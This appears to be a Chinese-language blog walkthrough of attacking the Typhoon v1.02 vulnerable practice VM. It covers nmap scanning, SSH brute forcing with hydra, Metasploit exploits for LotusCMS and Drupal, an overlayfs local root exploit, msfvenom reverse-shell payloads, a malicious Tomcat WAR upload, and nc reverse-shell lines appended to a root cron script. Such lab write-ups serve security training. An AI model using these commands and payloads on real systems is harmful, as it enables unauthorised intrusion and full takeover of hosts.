Typhoon-v1.02 靶机入侵

妖狐艹你老母 2024-04-07 10:55 193阅读 0赞

0x01 前言

Typhoon VM包含多个漏洞和配置错误。Typhoon可用于测试网络服务中的漏洞,配置错误,易受攻击的Web应用程序,密码破解攻击,权限提升攻击,后期利用步骤,信息收集和DNS攻击。

Typhoon-v1.02镜像下载地址:

https://download.vulnhub.com/typhoon/Typhoon-v1.02.ova.torrent

0x02 信息收集

1**.**存活主机扫描

arp-scan -l

5a85ab6621c022f081bdbfe2a4b8fddd.jpeg

发现192.168.1.104就是目标靶机系统

2.**端口探测**

  1. nmap-A   192.168.1.104
  3. root@kali2018:~# nmap -A 192.168.1.104
  5. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-30 09:17 EST
  7. Nmap scan report for 192.168.1.104
  9. Host is up (0.0012s latency).
  11. Not shown: 983 closed ports
  13. PORT     STATE SERVICE     VERSION
  15. 21/tcp   open  ftpvsftpd 3.0.2
  17. |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
  19. | ftp-syst:
  21. |   STAT:
  23. | FTP server status:
  25. |      Connected to 192.168.1.21
  27. |      Logged in as ftp
  29. |      TYPE: ASCII
  31. |      No session bandwidth limit
  33. |      Session timeout in seconds is 300
  35. |      Control connection is plain text
  37. |      Data connections will be plain text
  39. |      At session startup, client count was 1
  41. |      vsFTPd 3.0.2 - secure, fast, stable
  43. |_End of status
  45. 22/tcp   open  sshOpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
  47. | ssh-hostkey:
  49. |   1024 02:df:b3:1b:01:dc:5e:fd:f9:96:d7:5b:b7:d6:7b:f9 (DSA)
  51. |   2048 de:af:76:27:90:2a:8f:cf:0b:2f:22:f8:42:36:07:dd (RSA)
  53. |   256 70:ae:36:6c:42:7d:ed:1b:c0:40:fc:2d:00:8d:87:11 (ECDSA)
  55. |_  256 bb:ce:f2:98:64:f7:8f:ae:f0:dd:3c:23:3b:a6:0f:61 (ED25519)
  57. 25/tcp   open  smtpPostfix smtpd
  59. |_smtp-commands: typhoon, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
  61. | ssl-cert: Subject: commonName=typhoon
  63. | Not valid before: 2018-10-22T19:38:20
  65. |_Not valid after:2028-10-19T19:38:20
  67. |_ssl-date: TLS randomness does not represent time
  69. 53/tcp   open  domainISC BIND 9.9.5-3 (Ubuntu Linux)
  71. | dns-nsid:
  73. |_  bind.version: 9.9.5-3-Ubuntu
  75. 80/tcp   open  httpApache httpd 2.4.7 ((Ubuntu))
  77. | http-robots.txt: 1 disallowed entry
  79. |_/mongoadmin/
  81. |_http-server-header: Apache/2.4.7 (Ubuntu)
  83. |_http-title: Typhoon Vulnerable VM by PRISMA CSI
  85. 110/tcp  open  pop3?
  87. |_ssl-date: TLS randomness does not represent time
  89. 111/tcp  open  rpcbind2-4 (RPC #100000)
  91. | rpcinfo:
  93. |   program version   port/protoservice
  95. |   100000  2,3,4111/tcp  rpcbind
  97. |   100000  2,3,4111/udp  rpcbind
  99. |   100003  2,3,42049/tcp  nfs
  101. |   100003  2,3,42049/udp  nfs
  103. |   100005  1,2,338424/udp  mountd
  105. |   100005  1,2,353737/tcp  mountd
  107. |   100021  1,3,444055/udp  nlockmgr
  109. |   100021  1,3,460468/tcp  nlockmgr
  111. |   100024  139322/tcp  status
  113. |   100024  145147/udp  status
  115. |   100227  2,32049/tcp  nfs_acl
  117. |_  100227  2,32049/udp  nfs_acl
  119. 139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  121. 143/tcp  open  imapDovecot imapd
  123. 445/tcp  open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
  125. 631/tcp  open  ippCUPS 1.7
  127. | http-methods:
  129. |_  Potentially risky methods: PUT
  131. | http-robots.txt: 1 disallowed entry
  133. |_/
  135. |_http-server-header: CUPS/1.7 IPP/2.1
  137. |_http-title: Home - CUPS 1.7.2
  139. 993/tcp  open  ssl/imapDovecot imapd
  141. |_imap-capabilities: CAPABILITY
  143. | ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
  145. | Not valid before: 2018-10-22T19:38:49
  147. |_Not valid after:2028-10-21T19:38:49
  149. |_ssl-date: TLS randomness does not represent time
  151. 995/tcp  open  ssl/pop3s?
  153. | ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
  155. | Not valid before: 2018-10-22T19:38:49
  157. |_Not valid after:2028-10-21T19:38:49
  159. |_ssl-date: TLS randomness does not represent time
  161. 2049/tcp open  nfs_acl     2-3 (RPC #100227)
  163. 3306/tcp open  mysql       MySQL (unauthorized)
  165. 5432/tcp open  postgresql  PostgreSQL DB 9.3.3 - 9.3.5
  167. | ssl-cert: Subject: commonName=typhoon
  169. | Not valid before: 2018-10-22T19:38:20
  171. |_Not valid after:2028-10-19T19:38:20
  173. |_ssl-date: TLS randomness does not represent time
  175. 8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
  177. | http-methods:
  179. |_  Potentially risky methods: PUT DELETE
  181. |_http-open-proxy: Proxy might be redirecting requests
  183. |_http-server-header: Apache-Coyote/1.1
  185. |_http-title: Apache Tomcat
  187. MAC Address: 00:0C:29:5A:82:7D (VMware)
  189. Device type: general purpose
  191. Running: Linux 3.X|4.X
  193. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
  195. OS details: Linux 3.2 - 4.9
  197. Network Distance: 1 hop
  199. Service Info: Hosts:  typhoon, TYPHOON; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  203. Host script results:
  205. |_clock-skew: mean: -39m59s, deviation: 1h09m15s, median: 0s
  207. |_nbstat: NetBIOS name: TYPHOON, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
  209. | smb-os-discovery:
  211. |   OS: Unix (Samba 4.1.6-Ubuntu)
  213. |   Computer name: typhoon
  215. |   NetBIOS computer name: TYPHOON\x00
  217. |   Domain name: local
  219. |   FQDN: typhoon.local
  221. |_  System time: 2019-01-30T16:20:26+02:00
  223. | smb-security-mode:
  225. |   account_used: guest
  227. |   authentication_level: user
  229. |   challenge_response: supported
  231. |_  message_signing: disabled (dangerous, but default)
  233. | smb2-security-mode:
  235. |   2.02:
  237. |_    Message signing enabled but not required
  239. | smb2-time:
  241. |   date: 2019-01-30 09:20:26
  243. |_  start_date: N/A
  247. TRACEROUTE
  249. HOP RTT     ADDRESS
  251. 1   1.21 ms 192.168.1.104
  255. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  257. Nmap done: 1 IP address (1 host up) scanned in 193.97 seconds

可发现80,8080,22等端口开放。

3.**目录扫描**

通过dirb对目标网站进行扫描发现存在phpmyadmin以及robots.txt和drupal,cms等目录文件

c874dddcf00049bc3e7eebc457f36325.jpeg

0x03**靶机攻击**

1.**ssh**端口爆破

1.1**枚举账号**

发现端口22开放,其版本为openssh 6.6.1p1,利用OpenSSH新爆出的CVE爆出目标主机的用户,这对特定的用户爆破密码,建议爆破1000条。先用searchsploit查找OpenSSH 6.6.1p1出现的漏洞,找到两个用户名枚举漏洞.

272d198a98317b800c2ca1db9840f0df.jpeg

  1. root@kali2018:~#searchsploit   openssh

b669f3226c08b00c8afcbb563eab149b.jpeg

利用msf进行账号枚举。这里的用户名字典我采用:

https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-user-passwd/names/namelist.txt

ed94663992409f33e7cc26040ef258f9.jpeg

8b54a38c43bdcc13db48de4db8cbb225.jpeg

a498b57748f5362479db845a8e2e9545.jpeg

上图中可以看到成功枚举出admin账号,通过hydra对靶机的ssh进行爆破。

hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz -t4 ssh://192.168.1.104

7997d610074ded90f43af9384a144f8f.jpeg

可以看到成功爆破了ssh,用户名为:admin 密码为:metallica

本地登录远程靶机的ssh

  1. ssh admin@192.168.1.104

73e5df8375f0ed5948643ccffe123658.jpeg

774bffd41282b7f1dfc581b04f0f507b.jpeg

1.2**权限提升**

登陆进去以后我尝试命令:sudo bash , 再输入密码发现成功的GET到root权限,这种方法不稳定

  1. admin@typhoon:~$ sudo bash
  3. [sudo] password for admin:
  5. root@typhoon:~#

e11be3e0a9f15a79c7ab182331e0742b.jpeg

2.**web 应用mongo**

2.1 信息收集

通过上面nmap扫描出80端口带有的mongoadmin目录以及目录扫描出来的robots.txt

访问:http://192.168.1.104/robots.txt

581f41c4c1dc26af78a1909927c1c6df.jpeg

转到该目录,您将看到一个用于管理公开的Mongo实例的Web界面, 稍后点击几下,您将看到SSH帐户的凭据

9542a95f752af191d6a4ada6edc98c63.jpeg

327f9d9567d55a7fba7311405159501d.jpeg

ssh typhoon@192,168.30.129

955aeb954dacb4adbf8eebab0141b2d0.jpeg

2.2**权限提升**

获得低权限shell后,下一步是将权限升为root。在您的信息收集过程中,您会注意到一个看起来很奇怪的脚本/tab/script.sh

find / -type f -perm /o+w 2>/dev/null | grep -Ev ‘(proc|sys|www)’

97b8beefb49d5b4a2c48ceb9c8f46c7d.jpeg

可以猜测该脚本是以root用户权限运行的一个cron。那么我们可以nc用来进行反弹shell。但是,主机上nc没有-e选项。

没问题。我们仍然可以做这样的事情。一方面,nc在攻击机器上打开一个监听器。另一方面,将以下命令添加到/tab/script.sh

echo ‘rm -rf /tmp/p; mknod /tmp/p p; /bin/bash 0/tmp/p’ >> /tab/script.sh

a99ab02594a95dae989c5d02b27d6dfe.jpeg

在攻击主机上执行NC进行监听

  1. nc  -lvvp 1234

a2be66811e1ae8c0836d18c87442a1a8.png

3.**web**应用cms

3.1 漏洞攻击

更进一步,我做了nikto扫描主机,并找到了一些有趣的目录。

df00e37b362030932c2cf48736f0c36d.png

扫描结果之后在/cms目录中,发现一个内容管理系统正在运行,称为“LotusCMS”

d550593f28d99aa09b7e255c41c845ec.png

过单击login选项,已重定向到CMS登录后台页面。

7091376c4eb2b7628b05a23af814d943.jpeg

然后我搜索了此CMS登录的默认凭据,我发现此CMS容易受到eval()函数中存在的一个远程执行代码漏洞的攻击。

https://cdn-images-1.medium.com/max/1600/1\*Zo2\_x5Y63LoUT1UwwjMq5Q.png

通过链接浏览,我发现metasploit为此提供利用exp

https://cdn-images-1.medium.com/max/1600/1\*viMDAVL336hp-dwlglfwpA.png

在kali中打开msfconsole,并使用了以下exp

dc3766f7722f9fa2294a484c62458fb3.jpeg

然后设置RHOST的远程IP地址和运行CMS的URI路径。

27e5bd93946b559b49a61a12032b3db1.jpeg

  1. msf > search lcms_php_exec
  5. Matching Modules
  7. ================
  11.    Name                              Disclosure Date  Rank       Description
  13.    ----                              ---------------  ---------------
  15. exploit/multi/http/lcms_php_exec2011-03-03       excellent  LotusCMS 3.0 eval() Remote Command Execution
  19. msf > use exploit/multi/http/lcms_php_exec
  21. msf exploit(multi/http/lcms_php_exec) > show options
  25. Module options (exploit/multi/http/lcms_php_exec):
  29.    Name     Current Setting  RequiredDescription
  31.    ----     ---------------  -------------------
  33.    Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  35.    RHOST                     yes       The target address
  37.    RPORT    80               yes       The target port (TCP)
  39.    SSL      false            no        Negotiate SSL/TLS for outgoing connections
  41.    URI      /lcms/           yes       URI
  43.    VHOST                     no        HTTP server virtual host
  49. Exploit target:
  53.    Id  Name
  55.    --  ----
  57.    0   Automatic LotusCMS 3.0
  63. msf exploit(multi/http/lcms_php_exec) > set rhost
  65. set rhost 
  67. msf exploit(multi/http/lcms_php_exec) > set rhost 192.168.1.104
  69. rhost => 192.168.1.104
  71. msf exploit(multi/http/lcms_php_exec) > set rport  80
  73. rport => 80
  75. msf exploit(multi/http/lcms_php_exec) > set URI /cms/
  77. URI => /cms/
  79. msf exploit(multi/http/lcms_php_exec) > exploit
  83. [*] Started reverse TCP handler on 192.168.1.21:4444
  85. [*] Using found page param: /cms/index.php?page=index
  87. [*] Sending exploit ...
  89. [*] Sending stage (37775 bytes) to 192.168.1.104
  91. [*] Meterpreter session 1 opened (192.168.1.21:4444 -> 192.168.1.104:42221) at 2019-01-30 12:04:16 -0500 
  93. meterpreter > pwd
  95. /var/www/html/cms
  97. meterpreter > shell
  99. Process 20898 created.
  101. Channel 0 created.
  103. /bin/bash -i
  105. bash: cannot set terminal process group (2480): Inappropriate ioctl for device
  107. bash: no job control in this shell

当我运行’exploit’命令时,我的反向shell被执行了,得到了一个session会话。

ce8a849254fc671c5c17b00aa48295d6.jpeg

在获得了meterpreter会话后,已经进入了一个交互式bash shell,发现用户是id为33的’www-data’

558b592a29215d19eac3f58bd769456c.jpeg

3.2 权限提升

进入系统后,使用以下命令检查操作系统的内核版本

  1. uname  -a

dc24162df23ac08ca5ba95cf8609f3aa.jpeg

获得Linux版本后,使用searchsploit搜索漏洞,发现Linux内核版本“overlayFS”容易受到本地权限提升的影响。

  1. root@kali2018:~# searchsploit  linux 3.13.0

23defd9e5c1e82c60939b2af35d72da5.jpeg

然后将利用exp复制到/opt目录下

  1. root@kali2018:~# cp /usr/share/exploitdb/exploits/linux/local/37292.c /opt

e7a0e4d90625cf50cccd15c655721b43.jpeg

使用python搭建小型http服务器,以提供利用exp下载

  1. python -m  SimpleHTTPServer 81

1db5ad4e347cc2f06785e553e5a549a6.jpeg

使用wget命令将该利用exp从kali主机下载到到目标主机tmp目录。(只有tmp目录具有写入文件的权限)

  1. www-data@typhoon:/var/www/html/cms$ cd /tmp
  3. www-data@typhoon:/tmp$ wget  http://192.168.1.21:81/37292.c
  5. wget http://192.168.1.21:81/37292.c
  7. --2019-01-30 19:24:13--  http://192.168.1.21:81/37292.c
  9. Connecting to 192.168.1.21:81... connected.
  11. HTTP request sent, awaiting response... 200 OK
  13. Length: 5119 (5.0K) [text/plain]
  15. Saving to: '37292.c'
  19.      0K ....100% 8.28M=0.001s
  23. 2019-01-30 19:24:13 (8.28 MB/s) - '37292.c' saved [5119/5119]
  27. www-data@typhoon:/tmp$ ls
  29. 37292.c
  31. 65d9383ff514cbd01ac65e38806095d7.dat
  33. 8c10a35add3f21e11383c7911852072e.dat
  35. f71487e6e9c666dc5b99e37305c00db5.dat
  37. hsperfdata_tomcat7
  39. mongodb-27017.sock
  41. tomcat7-tomcat7-tmp

cff0281f65afb79d9fd4697adfd7a161.jpeg

使用以下命令编译exp

gcc -o <输出文件名>

  1. www-data@typhoon:/tmp$ gcc 37292.c  -o37292
  3. www-data@typhoon:/tmp$ ls

https://cdn-images-1.medium.com/max/1600/1\*TMLuJReUq0shMejsGN83Ig.png

当我运行已编译的文件时,将普通用户通过升级权限成为root用户

  1. www-data@typhoon:/tmp$ ./37292

9957af5ffe1ddba872ed90a1760ca48e.jpeg

使用命令/bin/bash -i将生成交互式shell

# /bin/bash -i

97a2377cd0aa85a8e96e0a30508e5b18.jpeg

falg:

进入root目录然后读取flag信息

  1. root@typhoon:/tmp# cd /root
  3. root@typhoon:/root# cat root-flag

8eb6bd1a65c8a34553a282a7b1a4554a.jpeg

4.**web**应用Tomcat

4.1 漏洞攻击

使用Tomcat Manager Upload获取meterpreter,然后进一步建立反向连接以获得root访问权限。

从namp扫描端口可发现8080端口已开发,并且是Apache Tomcat / Coyote JSP Engine 1.1版本。在浏览器上窗口中打开地址:http://192.168.1.104:8080

85c7f3249724811f4ce556c58f3c8ac0.jpeg

851869655da3e62fc3f6ec241da7dc4d.jpeg

使用Metasploits Tomcat Manager的默认用户名tomcat和默认密码tomcat登录到tomcat管理后台。

c385fa005de87b8dbde830a03d24628d.jpeg

使用msf对其tomcat进行攻击。

bcf6190b2b673111d608c58f88408360.jpeg

720ef6af2ebe337216d3f70ced1f1796.jpeg

4.2 权限提升

我们需要使用Msfvenom创建一个bash代码:

  1. msfvenom  p  cmd/unix/reverse_netcat   lhost=192.168.1.21   lport=2223  R

fba1ef241c6959c44f871041980ab53c.jpeg

之后将上面生成的恶意代码在目标靶机系统中添加到script.sh文件

  1. echo "mkfifo /tmp/uodb; nc 192.168.1.21 222 0</tmp/uodb | /bin/sh >/tmp/uodb 2>&1; rm /tmp/uodb " > script.sh

3c2768cbcb12fe6165c23a972c3f2bc4.jpeg

由于恶意代码是使用script.sh文件执行的。因此我们在netcat监听器上有一个反弹shell。

99afd1271a3593170e19f42e54c78a9b.jpeg

5.web**应用drupal**

通过上面目录扫描工具dirb对目标网站扫描发现有drupal cms

65a14b67ae734de3928658aec3f9c6c5.jpeg

d030a0fafc83832b3254556d306892ae.jpeg

我们通过利用metasploit搜索Drupal cms模块漏洞进行攻击

  1. use exploit/unix/webapp/drupal_drupalgeddon2
  3. msf exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.104
  5. msf exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
  7. msf exploit(/unix/webapp/drupal_drupalgeddon2) > exploit

4210615eb7118ca309386b05a90c7d9a.jpeg

6.Tomcat**的后台管理获取shell**

通过上面目录扫描工具dirb扫描发现8080端口开放的tomcat服务

通过google可知默认的tomcat后台目录为/manager/html,用户名:tomcat,密码:tomcat

047c53262f13746bf196c295b492bf26.jpeg

我们可以msfvenom来生WAR文件

  1. msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.21   LPORT=4444  -f war -o    evil.war

493ac4890c45a4156ae4cc5a43599be3.jpeg

可以看到evulll.war具体内容:

5c64aad98e7e84d3b077172e40c2bdb2.jpeg

我已经成功部署了webapp

3d99ea1e4907a80549401db1cb48f5d8.jpeg

55a1b38db5fd747980a60391d0d46cf0.jpeg

要访问恶意Web应用程序,请在浏览器的地址栏中输入以下内容:

http://192.168.1.104:8080/evil/tudvpurwgjh.jsp

本地监听NC可反弹

bfc01a62abf4811b9ac1b2d25414d777.jpeg

同是也可以上传大马war包

e3bb6f911c63315018fda7ec8e4dd13a.jpeg

发表评论

表情:
评论列表 (有 0 条评论,193人围观)

还没有评论,来说两句吧...

相关阅读

    相关 Raven: 2靶机入侵

    0x00 前言 Raven 2是一个中等难度的boot2root 虚拟靶机。有四个flag需要找出。在多次被攻破后,Raven Security采取了额外措施来增强他们的

    野性酷女野性酷女/ 0/ 221 阅读